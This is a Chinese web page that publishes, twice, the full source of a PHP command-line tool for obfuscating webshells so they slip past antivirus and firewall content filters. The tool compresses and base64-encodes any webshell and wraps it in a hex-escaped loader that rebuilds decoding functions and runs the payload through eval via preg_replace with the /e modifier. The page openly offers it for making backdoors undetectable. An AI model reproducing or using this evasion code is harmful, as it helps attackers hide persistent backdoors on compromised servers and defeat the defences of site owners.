php shell超強(qiáng)免殺、減少體積工具實(shí)現(xiàn)代碼
更新時(shí)間:2012年10月16日 20:09:31 作者:
這不是webshell,只是個(gè)webshell免殺工具,切勿當(dāng)初webshell使用,僅限免殺phpwebshell
lostwolf寫(xiě)的
這不是webshell,只是個(gè)webshell免殺工具
切勿當(dāng)初webshell使用
僅限免殺phpwebshell
該工具運(yùn)行在 cli 模式!
如果有無(wú)法突破的文件內(nèi)容過(guò)濾 可嘗試下用這個(gè)工具 免殺大馬!
任意php webshell 通過(guò)此工具編碼之后可以饒過(guò)國(guó)內(nèi)一些bt的防火墻
<?php
/*
Title: PHP shell nokill T00L
Blog: exploit-db.blogcn.com
*/
error_reporting(0);
@ini_set('memory_limit','-1');
set_time_limit(0);
$toolname="$argv[0]";
if ($argc<2) {
baner($toolname);
die;
}
$input_file= trim($argv[1]);
$output_file='nokill_'.$input_file;
if (file_exists($input_file)) {
No_kill_c0de($input_file,$output_file);
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
echo "Input: {$input_file}\r\n";
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;
echo "[+] Generate success!\r\n";
echo "Saved to {$file_full_path}"."\r\n";
} else {
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
die("[-] Failed ! The File $input_file does not exist");
}
function No_kill_c0de($input_file,$output_file){
$no_whitespace=php_strip_whitespace($input_file);
$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>');
$enfile=base64_encode(gzdeflate($no_php_tag));
$shellcode="\x3c\x3f\x70\x68\x70\xd\xa";
$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa";
$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa";
$shellcode.="\x3f\x3e";
file_put_contents("$output_file",$shellcode);
}
function baner($toolname){
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
echo "Usage: {$toolname} phpwebshell\r\n";
}
?>
這不是webshell,只是個(gè)webshell免殺工具
切勿當(dāng)初webshell使用
僅限免殺phpwebshell
該工具運(yùn)行在 cli 模式!
如果有無(wú)法突破的文件內(nèi)容過(guò)濾 可嘗試下用這個(gè)工具 免殺大馬!
任意php webshell 通過(guò)此工具編碼之后可以饒過(guò)國(guó)內(nèi)一些bt的防火墻
復(fù)制代碼 代碼如下:
<?php
/*
Title: PHP shell nokill T00L
Blog: exploit-db.blogcn.com
*/
error_reporting(0);
@ini_set('memory_limit','-1');
set_time_limit(0);
$toolname="$argv[0]";
if ($argc<2) {
baner($toolname);
die;
}
$input_file= trim($argv[1]);
$output_file='nokill_'.$input_file;
if (file_exists($input_file)) {
No_kill_c0de($input_file,$output_file);
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
echo "Input: {$input_file}\r\n";
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;
echo "[+] Generate success!\r\n";
echo "Saved to {$file_full_path}"."\r\n";
} else {
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
die("[-] Failed ! The File $input_file does not exist");
}
function No_kill_c0de($input_file,$output_file){
$no_whitespace=php_strip_whitespace($input_file);
$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>');
$enfile=base64_encode(gzdeflate($no_php_tag));
$shellcode="\x3c\x3f\x70\x68\x70\xd\xa";
$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."\xd\xa";
$shellcode.="\x24\x62\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x66\x27\x2c\x22\x22\x2c\x22\x62\x66\x61\x66\x73\x66\x65\x66\x36\x66\x34\x66\x5f\x66\x66\x64\x66\x66\x65\x66\x66\x63\x66\x66\x6f\x66\x66\x64\x66\x66\x65\x66\x22\x29\x3b\xd\xa\x24\x67\x3d\x73\x74\x72\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x58\x27\x2c\x27\x27\x2c\x27\x67\x58\x58\x7a\x58\x58\x69\x58\x58\x6e\x58\x58\x58\x58\x66\x58\x58\x58\x6c\x58\x58\x61\x58\x58\x58\x74\x58\x58\x58\x58\x58\x65\x27\x29\x3b\xd\xa\x70\x72\x65\x67\x5f\x72\x65\x70\x6c\x61\x63\x65\x28\x27\x5c\x27\x61\x5c\x27\x65\x69\x73\x27\x2c\x27\x65\x27\x2e\x27\x76\x27\x2e\x27\x61\x27\x2e\x27\x6c\x27\x2e\x27\x28\x24\x67\x28\x24\x62\x28\x24\x65\x6e\x66\x69\x6c\x65\x29\x29\x29\x27\x2c\x27\x61\x27\x29\x3b\xd\xa";
$shellcode.="\x3f\x3e";
file_put_contents("$output_file",$shellcode);
}
function baner($toolname){
echo "PHP shell nokill T00L\r\n";
echo "Blog: exploit-db.blogcn.com\r\n";
echo "Usage: {$toolname} phpwebshell\r\n";
}
?>
您可能感興趣的文章:
- PHP中exec函數(shù)和shell_exec函數(shù)的區(qū)別
- 用PHP和Shell寫(xiě)Hadoop的MapReduce程序
- 利用perl、python、php、shell、sed、awk、c 實(shí)現(xiàn)字符串的翻轉(zhuǎn)
- 監(jiān)控服務(wù)器swap并重啟php的Shell腳本
- php使用exec shell命令注入的方法講解
- shell腳本作為保證PHP腳本不掛掉的守護(hù)進(jìn)程實(shí)例分享
- 解析php中如何直接執(zhí)行SHELL
- PHP教程之PHP中shell腳本的使用方法分享
- 使用php shell命令合并圖片的代碼
- php調(diào)用shell的方法
相關(guān)文章
CI框架中類(lèi)的自動(dòng)加載問(wèn)題分析
這篇文章主要介紹了CI框架中類(lèi)的自動(dòng)加載問(wèn)題,結(jié)合實(shí)例形式分析了CI框架中類(lèi)的自動(dòng)加載功能與具體操作技巧,需要的朋友可以參考下2016-11-11
Ha0k 0.3 PHP 網(wǎng)頁(yè)木馬修改版
Ha0k 0.3 PHP 網(wǎng)頁(yè)木馬修改版,大家可以看下,對(duì)于此類(lèi)文件的防御方法,可以參考腳本之家發(fā)布的文章。2009-10-10
詳解PHP內(nèi)置訪問(wèn)資源的超時(shí)時(shí)間 time_out file_get_contents read_file
本篇文章是對(duì)PHP內(nèi)置訪問(wèn)資源的超時(shí)時(shí)間time_out file_get_contents read_file進(jìn)行了詳細(xì)的分析介紹,需要的朋友參考下2013-06-06
PHP防止post重復(fù)提交數(shù)據(jù)的簡(jiǎn)單例子
這篇文章主要介紹了PHP防止post重復(fù)提交數(shù)據(jù)的簡(jiǎn)單例子,使用session記錄一個(gè)數(shù)值的方法實(shí)現(xiàn),需要的朋友可以參考下2014-06-06
CI(CodeIgniter)框架實(shí)現(xiàn)圖片上傳的方法
這篇文章主要介紹了CI(CodeIgniter)框架實(shí)現(xiàn)圖片上傳的方法,結(jié)合實(shí)例形式分析了基于CodeIgniter調(diào)用文件上傳類(lèi)實(shí)現(xiàn)圖片上傳功能的相關(guān)操作技巧,需要的朋友可以參考下2017-03-03

